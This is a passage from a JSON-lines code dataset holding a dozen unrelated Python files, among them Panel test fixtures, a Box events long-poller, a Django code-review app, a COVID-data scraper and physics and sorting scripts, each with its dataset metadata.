= []\n def create_sessions(slugs, titles):\n app1_slug, app2_slug = slugs\n apps = {\n app1_slug: Markdown('First app'),\n app2_slug: Markdown('Second app')\n }\n server = serve(apps, port=5008, title=titles, show=False, start=False)\n servers.append(server)\n session1 = pull_session(\n 
url=f\"http://localhost:{server.port:d}/app1\",\n io_loop=server.io_loop\n )\n session2 = pull_session(\n url=f\"http://localhost:{server.port:d}/app2\",\n io_loop=server.io_loop\n )\n return session1, session2\n yield create_sessions\n for server in servers:\n try:\n server.stop()\n except AssertionError:\n continue # tests may already close this\n\n\n@pytest.fixture\ndef with_curdoc():\n old_curdoc = state.curdoc\n state.curdoc = Document()\n try:\n yield\n finally:\n state.curdoc = old_curdoc\n\n\n@contextmanager\ndef set_env_var(env_var, value):\n old_value = os.environ.get(env_var)\n os.environ[env_var] = value\n yield\n if old_value is None:\n del os.environ[env_var]\n else:\n os.environ[env_var] = old_value\n\n\n@pytest.fixture(autouse=True)\ndef module_cleanup():\n \"\"\"\n Cleanup Panel extensions after each test.\n \"\"\"\n to_reset = list(panel_extension._imports.values())\n Model.model_class_reverse_map = {\n name: model for name, model in Model.model_class_reverse_map.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }\n\n\n@pytest.fixture(autouse=True)\ndef server_cleanup():\n \"\"\"\n Clean up server state after each test.\n \"\"\"\n try:\n yield\n finally:\n state.kill_all_servers()\n state._indicators.clear()\n state._locations.clear()\n state._curdoc = None\n state.cache.clear()\n state._scheduled.clear()\n if state._thread_pool is not None:\n state._thread_pool.shutdown(wait=False)\n state._thread_pool = None\n\n@pytest.fixture(autouse=True)\ndef cache_cleanup():\n state.clear_caches()\n\n@pytest.fixture\ndef py_file():\n tf = tempfile.NamedTemporaryFile(mode='w', suffix='.py')\n try:\n yield tf\n finally:\n tf.close()\n\n\n@pytest.fixture\ndef threads():\n config.nthreads = 4\n try:\n yield 4\n finally:\n config.nthreads = None\n\n@pytest.fixture\ndef change_test_dir(request):\n os.chdir(request.fspath.dirname)\n yield\n os.chdir(request.config.invocation_dir)\n\n@pytest.fixture\ndef jupyter_server(port, change_test_dir, timeout=15):\n args = ['jupyter', 'server', '--port', str(port), \"--NotebookApp.token=''\"]\n process = Popen(args, stdout=PIPE, stderr=PIPE, bufsize=1, encoding='utf-8')\n os.set_blocking(process.stderr.fileno(), False)\n deadline = time.monotonic() + timeout\n while True:\n line = process.stderr.readline()\n time.sleep(0.02)\n if \"http://127.0.0.1:\" in line:\n host = \"http://127.0.0.1:\"\n break\n if \"http://localhost:\" in line:\n host = \"http://localhost:\"\n break\n if time.monotonic() > deadline:\n raise TimeoutError(\n 'jupyter server did not start within {timeout} seconds.'\n )\n port = int(line.split(host)[-1][:4])\n PORT[0] = port\n time.sleep(2)\n yield f\"http://localhost:{port}\"\n os.kill(process.pid, signal.SIGTERM)\n","sub_path":"panel/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558461478","text":"import requests\nimport sys\n\nif (len(sys.argv) < 2):\n print(\"Please supply a valid Developer Token as the first positional argument to this python script. 
You can create one by following the instructions here: https://developer.box.com/docs/getting-started-box-integration#section-using-the-box-api\")\n sys.exit()\n\n# Grab the first positional argument to the script, use it as the Developer Token.\nauth_header = {'Authorization': 'Bearer ' + sys.argv[1]}\n\nstream_position_url = 'https://api.box.com/2.0/events?stream_position=now'\nstream_position_response = requests.get(stream_position_url, headers=auth_header)\nstream_position = None\nif (stream_position_response.status_code == 401):\n print(\"The Developer Token you have supplied is invalid or has expired. Please generate a new one - instructions can be found here: https://developer.box.com/docs/getting-started-box-integration#section-using-the-box-api\")\n sys.exit()\nelse:\n stream_position = stream_position_response.json()['next_stream_position']\n\ndef get_polling_address():\n long_poll_address = requests.options('https://api.box.com/2.0/events', headers=auth_header).json()['entries'][0]['url']\n print('realtime url: ' + long_poll_address)\n return long_poll_address\n\nlong_poll_address = get_polling_address()\n\nwhile (True):\n print('long polling...')\n params = {'stream_position': stream_position}\n long_poll = requests.get(long_poll_address, params=params)\n message = long_poll.json()['message']\n print(message)\n\n # Get a new polling address when the long polling address tells us to reconnect, and go back to the top to open a new connection to it.\n if (message == 'reconnect'):\n long_poll_address = get_polling_address()\n continue\n\n print('fetching events')\n params = {'stream_position': stream_position}\n event_details = requests.get('https://api.box.com/2.0/events', headers=auth_header, params=params).json()\n event_id = event_details['entries'][0]['event_id']\n event_type = event_details['entries'][0]['event_type']\n stream_position = event_details['next_stream_position']\n print(event_id + \" | \" + event_type)\n","sub_path":"long-poll.py","file_name":"long-poll.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26896870","text":"\ndef merge(array0, array1):\n\ti0 = 0\n\ti1 = 0\n\tout = []\n\t\n\twhile (True):\n\t\tif i0<len(array0) and i1<len(array1):\n\t\t\tif (array0[i0]<array1[i1]):\n\t\t\t\tout.append(array0[i0])\n\t\t\t\ti0+=1\n\t\t\telse:\n\t\t\t\tout.append(array1[i1])\n\t\t\t\ti1+=1\n\t\telif i0<len(array0):\n\t\t\tout.append(array0[i0])\n\t\t\ti0+=1\n\t\telif i1<len(array1):\n\t\t\tout.append(array1[i1])\n\t\t\ti1+=1\n\t\telse:\n\t\t\tbreak\n\t\n\treturn out\n\ndef sort_level(array, left, right):\n\tif (left+1>=right):\n\t\treturn [array[left]]\n\telse:\n\t\tmiddle=int((right-left)/2)+left\n\t\tarray0=sort_level(array, left, middle)\n\t\tarray1=sort_level(array, middle, right)\n\t\treturn merge(array0, array1)\n\ndef sort(array):\n\t\"\"\"\n\tmerge sort the array and return the result\n\ttime complexity: O(n*log(n))\n\t\"\"\"\n\treturn sort_level(array, 0, len(array))\n\t\n","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"70034951","text":"import time \nfrom datetime import date\nfrom datetime import datetime\n\ndef get_day():\n today = date.today()\n año = today.year\n mes = today.month\n dia = today.day\n now = datetime.now()\n dia_semana = time.strftime(\"%A\")\n hora = now.hour\n minuto = now.minute\n segundo = 
now.second\n return año,mes,dia,dia_semana,hora,minuto,segundo\n\n\ndef get_month(mes):\n switcher = {\n 1: \"Enero\",\n 2: \"Febrero\",\n 3: \"Marzo\",\n 4: \"Abril\",\n 5: \"Mayo\",\n 6: \"Junio\",\n 7: \"Julio\",\n 8: \"Agosto\",\n 9: \"Septiembre\",\n 10: \"Octubre\",\n 11: \"Noviembre\",\n 12: \"Diciembre\"\n }\n return switcher.get(mes)\n\n","sub_path":"get_date.py","file_name":"get_date.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"225649577","text":"####\n# Each team's file must define four tokens:\n# team_name: a string\n# strategy_name: a string\n# strategy_description: a string\n# move: A function that returns 'c' or 'b'\n####\n\nteam_name = 'MasterChef'\nstrategy_name = 'Juke'\nstrategy_description = 'Checks past history and adjusts accordingly.'\nbetrays = 0\ndef move(my_history, their_history, my_score, their_score):\n global betrays\n if len(my_history) == 0:\n return 'c'\n if their_history[-1] == 'b':\n betrays += 1\n if their_history[-1] == 'b':\n for g in range(betrays):\n return 'b'\n elif their_history[-1] == 'c':\n return 'c'","sub_path":"team6.py","file_name":"team6.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566444192","text":"\"\"\"\nConsume elasticsearch save events from kafka.\n\"\"\"\nimport jsonschema\n\nfrom .utils.kafka_consumer import kafka_consumer\nfrom .utils.init_index import init_index\nfrom .utils.config import get_config\n\n\ndef main(queue):\n \"\"\"\n Main event loop for consuming messages from Kafka and saving to elasticsearch.\n \"\"\"\n config = get_config()\n topics = [config['elasticsearch_save_topic']]\n # Message handlers based on message key\n handlers = {\n b'index': _handle_index(queue),\n b'init_index': _handle_init_index\n }\n kafka_consumer(topics, handlers)\n\n\ndef _handle_index(queue):\n \"\"\"\n Handle an event to save a new index document.\n Note that this function is curried to accept the thread queue.\n \"\"\"\n def handler(msg_data):\n print(f\"Indexing document '{msg_data['id']}' in index '{msg_data['index']}'\")\n # Save a document to an existing index\n jsonschema.validate(instance=msg_data, schema=_INDEX_SCHEMA)\n # Push the data to save into the thread queue.\n # This will be consumed by the writer thread (see ./elasticsearch_writer.py)\n queue.put(msg_data)\n return handler\n\n\ndef _handle_init_index(msg_data):\n \"\"\"Handle an event to initialize a new index with a type mapping.\"\"\"\n print(f\"Initializing index '{msg_data['name']}'\")\n # Initialize a new index with a type mapping\n jsonschema.validate(instance=msg_data, schema=_INIT_INDEX_SCHEMA)\n init_index(msg_data)\n\n\n_INDEX_SCHEMA = {\n 'type': 'object',\n 'required': ['doc', 'id', 'index'],\n 'additionalProperties': False,\n 'properties': {\n 'id': {'type': 'string'},\n 'index': {'type': 'string'},\n 'doc': {'type': 'object'}\n }\n}\n\n\n_INIT_INDEX_SCHEMA = {\n 'type': 'object',\n 'required': ['name', 'props', 'alias'],\n 'additionalProperties': False,\n 'properties': {\n 'name': {'type': 'string'},\n 'alias': {'type': 'string'},\n 'props': {'type': 'object'}\n }\n}\n","sub_path":"src/elasticsearch_consumer.py","file_name":"elasticsearch_consumer.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597154856","text":"from pymongo import MongoClient \nimport 
json\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\n\nmyclient = MongoClient(\"mongodb://localhost:27017/\") \n \n# database \ndb = myclient[\"Posts3\"] \ncollection = db[\"data\"] \n\nprint(collection.find().count())\n\nref_list = defaultdict(int)\n\nfor stri in db.data.find():\n\t#print(stri)\n\tayushi = stri.get(\"@Tags\")\n\tif (ayushi is not None):\n\t\tl = ayushi[1:len(ayushi) - 1].split(\"><\")\n\t\tfor k in l:\n\t\t\tref_list[k] += 1\n\n# print(ref_list)\nfinal_list = sorted(ref_list.items(),key=lambda kv : kv[1],reverse=True)\n\nres = final_list[:10]\n\nprint(res)\nlist1, list2 = zip(*res)\n\nfig = plt.figure()\nax = fig.add_axes([0,0,1,1])\n\nax.bar(list1, list2)\nplt.show()\n","sub_path":"Part2/task1_tags_posts.py.py","file_name":"task1_tags_posts.py.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548702127","text":"import numpy as np\r\nfrom scipy.integrate import odeint\r\nimport matplotlib.pyplot as plt\r\n\r\n#global parameters\r\nMpl = 1\r\nG = 1./(8*np.pi*Mpl**2)\r\nm1 = 10**-6*Mpl\r\nm2 = 10**-1*Mpl\r\nphipk = 8*Mpl #the location of the peak of the additional gaussian potential\r\nmu = 4*Mpl**2 # sigma^2 of the additional gaussian potential\r\nalpha = 0\r\n\r\ndef V(phi,chi):\r\n return 1./2*m1**2*phi**2*(1 + alpha*np.tanh(m2*chi/Mpl**2)*np.exp(-(phi - phipk)**2/(2*mu)))\r\n\r\ndef V_phi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V(phi+eps/2,chi) - V(phi-eps/2,chi))/eps\r\n\r\ndef V_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V(phi,chi+eps/2) - V(phi,chi-eps/2))/eps\r\n\r\ndef d_dlna(var,lna,paras):\r\n H,phi,psi,chi,xi = var\r\n m1,m2 = paras\r\n return [(8*np.pi*G/(3*H))*(V(phi,chi) - H**2*(psi**2 + xi**2)) - H,\r\n psi,\r\n -2*psi - V_phi(phi,chi)/H**2 - (8*np.pi*G*psi/3)*(V(phi,chi)/H**2 - psi**2 - xi**2),\r\n xi,\r\n -2*xi - V_chi(phi,chi)/H**2 - (8*np.pi*G*xi/3)*(V(phi,chi)/H**2 - psi**2 - xi**2)]\r\n\r\ndef thirdH(phi,psi,chi,xi):\r\n return np.sqrt(2*V(phi,chi)/(3/(4*np.pi*G) - (psi**2 + xi**2)))\r\n\r\nphi0 = 15\r\npsi0 = 0\r\nchi0 = 0\r\nxi0 = 0\r\nH0 = thirdH(phi0,psi0,chi0,xi0)\r\nparas = [m1,m2]\r\nvar0 = [H0,phi0,psi0,chi0,xi0]\r\n\r\nlnaStop = 40\r\nnum_of_pts = 10000\r\nlnavals = np.linspace(0,lnaStop,num_of_pts)\r\n\r\nsol = odeint(d_dlna,var0,lnavals,args=(paras,))\r\nHvals = sol[:,0]\r\nphivals = sol[:,1]\r\npsivals = sol[:,2]\r\nchivals = sol[:,3]\r\nxivals = sol[:,4]\r\n\r\n\r\n\r\nplt.plot(lnavals,Hvals)\r\nplt.show()\r\n\r\n# perturbation fields\r\nepsvals = 0.5*(psivals**2 + xivals**2)\r\n\r\ndef V_phi_phi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_phi(phi+eps/2,chi) - V_phi(phi-eps/2,chi))/eps\r\n\r\ndef V_phi_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_phi(phi,chi+eps/2) - V_phi(phi,chi-eps/2))/eps\r\n\r\ndef V_chi_chi(phi,chi):\r\n eps = 10**-6*Mpl\r\n return (V_chi(phi,chi+eps/2) - V_chi(phi,chi-eps/2))/eps\r\n\r\nc_11 = V_phi_phi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(2*psivals*V_phi(phivals,chivals)) + (3 - epsvals)*psivals**2\r\n\r\nc_12 = V_phi_chi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(psivals*V_chi(phivals,chivals)\r\n + xivals*V_phi(phivals,chivals))+ (3 - epsvals)*psivals*xivals\r\n\r\nc_21 = c_12\r\n\r\nc_22 = V_chi_chi(phivals,chivals)/Hvals**2 + (1./Hvals**2)*(2*xivals*V_chi(phivals,chivals)) + (3 - epsvals)*xivals**2\r\n\r\ndotavals = np.exp(lnavals)*Hvals\r\nk = 200*H0\r\n\r\n# get_val_for_given_lna, return arr(lna)\r\ndef get_val(arr,x):\r\n return np.interp(x,lnavals,arr)\r\n\r\ndef d_dlna_ij(var,lna,paras):\r\n RePsi_11, ReTheta_11, ImPsi_11, ImTheta_11, RePsi_22, ReTheta_22, ImPsi_22, ImTheta_22 = var\r\n m1, m2 = paras\r\n result = [ReTheta_11,\r\n -((1-get_val(epsvals,lna))*ReTheta_11 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*RePsi_11 + 0*get_val(c_11,lna)*RePsi_11),\r\n ImTheta_11,\r\n -((1-get_val(epsvals,lna))*ImTheta_11 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*ImPsi_11 + 0*get_val(c_11,lna)*ImPsi_11),\r\n ReTheta_22,\r\n -((1-get_val(epsvals,lna))*ReTheta_22 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*RePsi_22 + 0*get_val(c_22,lna)*RePsi_22),\r\n ImTheta_22,\r\n -((1-get_val(epsvals,lna))*ImTheta_22 + (k**2/get_val(dotavals,lna)**2 - 2 + get_val(epsvals,lna))*ImPsi_22 + 0*get_val(c_22,lna)*ImPsi_22)]\r\n return result\r\n\r\nRePsi_22_0 = RePsi_11_0 = (1./np.sqrt(2*k))\r\nImPsi_22_0 = ImPsi_11_0 = 0\r\nReTheta_22_0 = ReTheta_11_0 = 0\r\nImTheta_22_0 = ImTheta_11_0 = -(1./dotavals[0])*np.sqrt(k/2)\r\n\r\nptb_init = [RePsi_11_0, ReTheta_11_0, ImPsi_11_0, ImTheta_11_0, RePsi_22_0, ReTheta_22_0, ImPsi_22_0, ImTheta_22_0]\r\n\r\nptb_sol = odeint(d_dlna_ij,ptb_init,lnavals,args=(paras,))\r\n\r\nRePsi_11_vals = ptb_sol[:,0]\r\nImPsi_11_vals = ptb_sol[:,2] # ImPsi_11 is the third component of the state vector\r\n\r\nplt.plot(lnavals,RePsi_11_vals/np.exp(lnavals))\r\nplt.plot(lnavals,ImPsi_11_vals/np.exp(lnavals))\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"new_pert_try_single.py","file_name":"new_pert_try_single.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"498128243","text":"# %%\ndef solution(A, B):\n L = max(A)\n P_max = max(B)\n fib = [0] * (L+2)\n fib[1] = 1\n for i in range(2, L + 2):\n fib[i] = (fib[i-1] + fib[i-2]) & ((1 << P_max) - 1)\n ladder_list = [0]*len(A)\n for i in range(len(A)):\n ladder_list[i] = fib[A[i]+1] & ((1 << B[i]) - 1)\n return ladder_list\n\n\nprint(solution([4, 4, 5, 5, 1], [3, 2, 4, 3, 1]))\n","sub_path":"ladder.py","file_name":"ladder.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186985599","text":"from tkinter import*\r\n\r\nwindow=Tk()\r\n\r\n\r\n#=======================================================================================================\r\n\r\n\r\nTitletxt= StringVar()\r\nYeartxt= StringVar()\r\nAuthortxt= StringVar()\r\nISBNtxt= StringVar()\r\n\r\n#======================================================================================================\r\n\r\nL1=Label(window,text=\"Title\")\r\nL1.grid(row=0,column=0)\r\nT1=Entry(window,textvariable=Titletxt)\r\nT1.grid(row=0,column=1)\r\n\r\nL2=Label(window,text=\"Year\")\r\nL2.grid(row=1,column=0)\r\nT2=Entry(window,textvariable=Yeartxt)\r\nT2.grid(row=1,column=1)\r\n\r\nL3=Label(window,text=\"Author\")\r\nL3.grid(row=0,column=2)\r\nT3=Entry(window,textvariable=Authortxt)\r\nT3.grid(row=0,column=3)\r\n\r\nL4=Label(window,text=\"ISBN\")\r\nL4.grid(row=1,column=2)\r\nT4=Entry(window,textvariable=ISBNtxt)\r\nT4.grid(row=1,column=3)\r\n\r\nlist1=Listbox(window, height=6,width=35)\r\nlist1.grid(row=2,column=0,rowspan=5,columnspan=2)\r\n\r\nsb1=Scrollbar(window)\r\nsb1.grid(row=2,column=2,rowspan=6)\r\n\r\nlist1.configure(yscrollcommand=sb1.set)\r\nsb1.configure(command=list1.yview)\r\n\r\nB1=Button(window,text=\"View all\",width=12)\r\nB1.grid(row=2,column=3)\r\nB2=Button(window,text=\"Search 
entry\",width=12)\r\nB2.grid(row=3,column=3)\r\nB3=Button(window,text=\"Add entry\",width=12)\r\nB3.grid(row=4,column=3)\r\nB4=Button(window,text=\"Update selected\",width=12)\r\nB4.grid(row=5,column=3)\r\nB5=Button(window,text=\"Delete selected\",width=12)\r\nB5.grid(row=6,column=3)\r\nB6=Button(window,text=\"Close\",width=12)\r\nB6.grid(row=7,column=3)\r\n\r\nwindow.mainloop()\r\n","sub_path":"script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550181754","text":"# from django.shortcuts import render_to_response\nfrom django.shortcuts import render\nfrom django.template import RequestContext\n# from django.utils import simplejson\ntry:\n import django.utils.simplejson\nexcept:\n import json as simplejson\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.core import serializers\nfrom django.db.models import Q\nfrom datetime import datetime\n\nfrom project_management.code_review.models import *\nfrom project_management.projects.models import ProjectMembership\n\n\n@login_required\ndef edit(request, code_review_id):\n code_review = CodeReview.objects.filter(id=code_review_id)\n team_members = Project.objects.get(\\\n id=code_review[0].project.id).team.filter(is_active=1).order_by('first_name')\n code_review_json = serializers.serialize(\"json\", code_review)\n team_members_json = serializers.serialize(\"json\", team_members)\n code_review_dict = [{\n 'code_review':code_review_json,\n 'team_members':team_members_json}]\n json = simplejson.dumps(code_review_dict)\n return HttpResponse(json, mimetype='application/json')\n\n\n@login_required\ndef get_team_members(request, project_id=None):\n if project_id != '' and project_id != None:\n '''\n Get team members for selected project\n '''\n team_members = Project.objects.get(\\\n id=project_id).team.filter(is_active=1).distinct().order_by('first_name')\n else:\n '''\n Get team members of a login user's all project, which are he included\n '''\n team_member_list = []\n [team_member_list.extend(each.team.filter(is_active=1).distinct().order_by(\\\n 'first_name')) for each in\n Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=1).distinct().exclude(cancel=True)]\n team_members = set(team_member_list)\n data = serializers.serialize(\"json\", team_members)\n json = simplejson.dumps(data)\n return HttpResponse(json, mimetype='application/javascript')\n\n\n@login_required\ndef save_review(request):\n patch = int(request.POST.get('patch'))\\\n if request.POST.get('patch') else None\n code_review = CodeReview.objects.filter(\\\n id=request.POST.get('code_review_id', ''))\n code_review_dict = {\n 'id': None if len(code_review) == 0 else code_review[0].id,\n 'reviewer_id': request.POST.get('reviewer', ''),\n 'engineer_id': request.POST.get('engineer', ''),\n 'project_id': request.POST.get('project', ''),\n 'review_date': request.POST.get('review_date', ''),\n 'patch_code': request.POST.get('patch_code', ''),\n 'patch': patch,\n 'build': int(request.POST.get('build'))\n if patch == 1 and request.POST.get('build') else None,\n 'test_case': int(request.POST.get('testcase'))\n if patch == 1 and request.POST.get('testcase') else None,\n 'comments': request.POST.get('comments', ''),\n 
'modified_by_id': request.user.id,\n 'created_by_id': request.user.id\n if len(code_review) == 0 else code_review[0].created_by.id,\n 'created_on': datetime.now().date()\n if len(code_review) == 0 else code_review[0].created_on,\n }\n code_review = CodeReview(**code_review_dict)\n code_review.save()\n return HttpResponseRedirect(reverse('codereview:list'))\n\n\n@login_required\ndef code_review_list(request):\n selected_project = ''\n selected_eng = ''\n search_reviewer = ''\n selected_patch = ''\n selected_build = ''\n selected_testcase = ''\n selected_from_date = ''\n selected_to_date = ''\n\n '''\n Get last updated code review's project, team and engineer.\n '''\n last_updated_pjt = ''\n code_review_list = CodeReview.objects.filter(\\\n reviewer=request.user.id).order_by('-modified_on')\n last_updated_pjt_team = []\n last_updated_eng = ''\n if len(code_review_list) > 0:\n last_updated_pjt = code_review_list[0].project.id\n last_updated_eng = code_review_list[0].engineer.id\n last_updated_pjt_team = Project.objects.get(is_active=1,\n id=last_updated_pjt).team.filter(is_active=1).distinct().order_by(\\\n 'first_name')\n query = Q(is_active = True) & Q(project__in = Project.objects.filter(\\\n Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=True).distinct().exclude(cancel=True).values('id'))\n if request.GET.get('search') == 'search':\n '''\n Form filter query for code review list, with search options.\n '''\n selected_from_date = request.POST.get('from_date', '')\n selected_to_date = request.POST.get('to_date', '')\n if request.POST.get('search_project', '') != '':\n selected_project = Project.objects.get(is_active=1,\\\n id=request.POST.get('search_project', '')).id\n query = query & Q(project = selected_project)\n if request.POST.get('search_engineer', '') != '':\n selected_eng = User.objects.get(is_active=1,\\\n id=request.POST.get('search_engineer', '')).id\n query = query & Q(engineer = selected_eng)\n if request.POST.get(\"search_reviewer\", '') != '':\n search_reviewer = User.objects.get(is_active=1,\\\n id=request.POST.get(\"search_reviewer\", '')).id\n query = query & Q(reviewer = search_reviewer)\n if selected_from_date != '':\n query = query & Q(review_date__gte = selected_from_date)\n if selected_to_date != '':\n query = query & Q(review_date__lte = selected_to_date)\n if request.POST.get(\"search_patch\", '') != '':\n selected_patch = request.POST.get(\"search_patch\", '')\n query = query & Q(patch = selected_patch\n if selected_patch != '2' else None)\n if request.POST.get(\"search_build\", '') != '':\n selected_build = request.POST.get(\"search_build\", '')\n query = query & Q(build = selected_build\n if selected_build != '2' else None)\n if request.POST.get(\"search_testcase\", '') != '':\n selected_testcase = request.POST.get(\"search_testcase\", '')\n query = query & Q(test_case = selected_testcase\n if selected_testcase != '2' else None)\n\n else:\n '''\n Form filter query with last entered project for code\n review and login user\n '''\n search_reviewer = request.user.id\n query = query & Q(reviewer = search_reviewer)\n if len(code_review_list) > 0:\n selected_project = last_updated_pjt\n query = query & Q(project = selected_project)\n code_review = CodeReview.objects.filter(\\\n query).order_by('-modified_on')\n projects = Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n 
.filter(is_active=1).distinct().exclude(cancel=True)\n if selected_project != '':\n '''\n Get team_members of login user's last entered project .\n '''\n team_members = Project.objects.get(is_active=1, id=selected_project).\\\n team.filter(is_active=1).distinct().order_by('first_name')\n else:\n '''\n At the first time access of code review page, get team members of a\n login user's all project, which are he included\n '''\n team_member_list = []\n [team_member_list.extend(each.team.filter(is_active=1).distinct().order_by(\\\n 'first_name')) for each in\n Project.objects.filter(Q(apex_body_owner=request.user) |\n Q(owner=request.user) |\n Q(team=request.user) | Q(requested_by = request.user))\\\n .filter(is_active=1).distinct().exclude(cancel=True)]\n team_members = set(team_member_list)\n page_data = {\n 'projects': projects,\n 'code_review': code_review,\n 'team_members': team_members,\n 'selected_project': selected_project,\n 'search_reviewer': search_reviewer,\n 'selected_eng': selected_eng,\n 'selected_patch': selected_patch,\n 'selected_build': selected_build,\n 'selected_testcase': selected_testcase,\n 'selected_from_date': selected_from_date,\n 'selected_to_date': selected_to_date,\n 'last_updated_pjt': last_updated_pjt,\n 'last_updated_pjt_team': last_updated_pjt_team \n if len(last_updated_pjt_team) > 0 else team_members,\n 'last_updated_eng': last_updated_eng,\n }\n return render(request, 'code_review.html', {'page_data': page_data},\n )\n","sub_path":"project_management/code_review/views1.py","file_name":"views1.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"161791400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 16 15:03:06 2021\n\n@author: EduardoWork\n\"\"\"\n\nfrom datetime import datetime\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nfrom scrape_sc_cov import extract_cov_data\nfrom scrape_sc_cov import get_elements_from_news_page\nfrom scrape_sc_cov import save_info\nfrom parse_sc_cov import parse_info\n\n\ndef check_new():\n \"\"\"Verifica se o database está atualizado.\n\n Returns\n -------\n new_elements (list): lista com os links dos novos dados\n \"\"\"\n parsed = parse_info('covid_sc_casos.csv') # list of dicts, in Pandas DataFrame\n last_date = parsed.max() # date in datetime, in Pandas DataFrame\n\n updated = False\n new_elements = []\n i = 0\n\n while not updated:\n\n # element: link com dados a serem extraídos\n elements = get_elements_from_news_page(\n 'https://www.sc.gov.br/noticias/temas/coronavirus?start=' +\n str(i) + str(0)\n )\n\n for element in elements:\n\n # Pegar data\n site = requests.get('https://www.sc.gov.br' + element,\n headers={'User-Agent': 'Custom'})\n soup = bs(site.content, features=\"lxml\")\n current_date = datetime.fromisoformat(soup.time['datetime'])\n # Se é mais novo, adicionar. Caso contrário, updated = True\n if (current_date > last_date).bool():\n new_elements.append(element)\n else:\n updated = True\n\n i += 1\n\n return new_elements\n\n\ndef update():\n \"\"\"Verifica se o database está atualizado. 
Se não estiver, atualiza.\"\"\"\n new = check_new()\n if len(new) == 0:\n print('Database is already updated')\n else:\n for element in new:\n casos, mortes = extract_cov_data(element)\n save_info(casos, mortes)\n print('Datebase was updated')\n\n\nif __name__ == '__main__':\n update()\n","sub_path":"update_sc_cov.py","file_name":"update_sc_cov.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"324075618","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nclass Spectra_Analysis():\n figure_number=1\n def __init__(self,foreground_location, \n background_location=None,\n zero_offset_fore=6,zero_offset_back=6,\n save_folder=None):\n '''\n Used to analyze various spectral features:\n Takes as arguements:\n foreground_location- string of the full path to uncalibrated\n spectrum files. Expects to only have \n a single column of the counts\n having length of number of bins\n background_location- string of full path to uncalibrated\n background spectrum. Expects same \n information as foreground_location \n zero_offset_fore- int indicating start line in the \n foreground spectrum\n zero_offset_back- int indicating start line in the \n background spectrum\n save_folder- full path to the folder to save images in \n '''\n super().__init__()\n #read in the foreground spectrum and create an associated bins\n #array to go with it\n f=open(foreground_location,'r')\n f_data=f.readlines()\n f.close()\n self.fore_bins=[]\n self.fore_counts=[]\n for i in range(zero_offset_fore,len(f_data)):\n self.fore_bins.append(i)\n self.fore_counts.append(float(f_data[i]))\n #if a background file exists read in the data \n self.back_bins=[]\n self.back_counts=[]\n if background_location!=None:\n g=open(background_location,'r')\n b_data=g.readlines()\n g.close()\n for j in range(zero_offset_back,len(b_data)):\n self.back_bins.append(j)\n self.back_counts.append(float(b_data[j]))\n if save_folder==None:\n self.save_folder=os.getcwd()\n else:\n self.save_folder=save_folder\n \n def average_count_rate(self,foreground_duration, background_duration=None):\n '''Calculate the average count rate for the foreground and \n backgound if included.\n Takes as arguments:\n foreground_duration- float of foreground accumulation time\n background_duration- float of background accumulation time\n defaults to None\n '''\n fore_sum=np.sum(self.fore_counts)\n fore_rate=fore_sum/foreground_duration\n if len(self.back_counts)!=0:\n back_sum=np.sum(self.back_counts) \n back_rate=back_sum/background_duration\n return fore_rate,back_rate\n else:\n return fore_rate,0\n \n def background_subtraction(self):\n '''\n Subtract the background from the foreground to see the total signature\n '''\n if len(self.back_bins)!=len(self.fore_bins):\n raise ValueError('Background of length {}, can\\'t be substracted from Foreground of length 